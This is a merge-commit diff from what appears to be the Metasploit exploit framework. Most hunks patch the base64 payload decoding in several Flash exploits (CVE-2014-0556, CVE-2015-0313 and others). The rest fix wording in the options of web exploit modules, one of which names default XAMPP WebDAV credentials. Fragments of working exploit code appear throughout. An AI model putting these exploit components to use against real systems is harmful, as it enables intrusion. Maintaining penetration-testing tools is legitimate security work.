Solve conflics

external/source/exploits/CVE-2014-0556/Main.as

@@ -27,7 +27,10 @@ package
 		public function Main() 
 		{
 			var b64:Base64Decoder = new Base64Decoder()
-			b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
+			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+			var pattern:RegExp = / /g;
+			b64_payload = b64_payload.replace(pattern, "+")
+			b64.decode(b64_payload)
 			var payload:String = b64.toByteArray().toString()
 			
 			for (i = 0; i < bv.length; i++) {

external/source/exploits/CVE-2014-0569/Main.as

@@ -32,9 +32,11 @@ package
 			var i:uint = 0
 			var j:uint = 0
 			
-			b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
-			payload = b64.toByteArray().toString();
-			
+			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+			var pattern:RegExp = / /g;
+			b64_payload = b64_payload.replace(pattern, "+")
+			b64.decode(b64_payload)
+			payload = b64.toByteArray().toString()
 			for (i = 0; i < defrag.length; i++) {
 				defrag[i] = new ByteArray()
 				defrag[i].length = BYTE_ARRAY_SIZE

external/source/exploits/CVE-2014-8440/Msf.as

@@ -42,8 +42,11 @@ package
 			this.object_vector_length = 5770 * 2
 			this.byte_array_vector_length = 510 * 2
 			
-			b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
-			payload = b64.toByteArray().toString();
+			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+			var pattern:RegExp = / /g;
+			b64_payload = b64_payload.replace(pattern, "+")
+			b64.decode(b64_payload)
+			payload = b64.toByteArray().toString()
                         
 			this.initialize_worker_and_ba()
 			if (!this.trigger())

external/source/exploits/CVE-2015-0313/Main.as

@@ -39,7 +39,10 @@ public class Main extends Sprite
 
     private function mainThread():void
     {
-        b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
+        var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+        var pattern:RegExp = / /g;
+        b64_payload = b64_payload.replace(pattern, "+")
+        b64.decode(b64_payload)
         payload = b64.toByteArray().toString()
 
         ba.length = 0x1000
@@ -204,4 +207,4 @@ public class Main extends Sprite
         return addr + i
     }
 }
-}
+}

external/source/exploits/CVE-2015-0359/Msf.as

@@ -43,7 +43,10 @@ package
 
 		private function mainThread():void
 		{
-			b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
+			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+			var pattern:RegExp = / /g;
+			b64_payload = b64_payload.replace(pattern, "+")
+			b64.decode(b64_payload)
 			payload = b64.toByteArray().toString()
 			ba.length = 0x1000
 			ba.shareable = true

lib/msf/core/exploit/http/client.rb

@@ -47,7 +47,7 @@ module Exploit::Remote::HttpClient
           Rex::Proto::Http::Client::DefaultUserAgent
           ]),
         OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
-        OptString.new('PASSWORD', [false, 'The HTTP password to specify for  authentication', '']),
+        OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
         OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]),
         OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]),
         OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL3', 'TLS1']]),

modules/exploits/multi/http/traq_plugin_exec.rb

@@ -17,12 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits an arbitrary command execution vulnerability in
         Traq 2.0 to 2.3. It's in the admincp/common.php script.
 
-        This function is called in each script located into /admicp/ directory to
-        make sure the user has admin rights, but this is a broken authorization
-        schema due to the header() function doesn't stop the execution flow. This
-        can be exploited by malicious users to execute admin functionality resulting
-        for  e.g.  in execution of arbitrary PHP code leveraging of plugins.php
-        functionality.
+        This function is called in each script located in the /admicp/ directory to
+        make sure the user has admin rights. This is a broken authorization schema
+        because the header() function doesn't stop the execution flow.
+        This can be exploited by malicious users to execute admin functionality,
+        e.g. execution of arbitrary PHP code leveraging of plugins.php functionality.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

modules/exploits/windows/http/xampp_webdav_upload_php.rb

@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
         OptString.new('PATH', [ true,  "The path to attempt to upload", '/webdav/']),
         OptString.new('FILENAME', [ false ,  "The filename to give the payload. (Leave Blank for Random)"]),
         OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']),
-        OptString.new('PASSWORD', [false, 'The HTTP password to specify for  authentication', 'xampp'])
+        OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp'])
       ], self.class)
   end
 

modules/exploits/windows/iis/iis_webdav_upload_asp.rb

@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
         # The USERNAME and PASSWORD are registered again to make them more obvious they're
         # configurable.
         OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
-        OptString.new('PASSWORD', [false, 'The HTTP password to specify for  authentication', '']),
+        OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
         OptString.new('PATH', [ true,  "The path to attempt to upload", '/metasploit%RAND%.asp'])
       ], self.class)
   end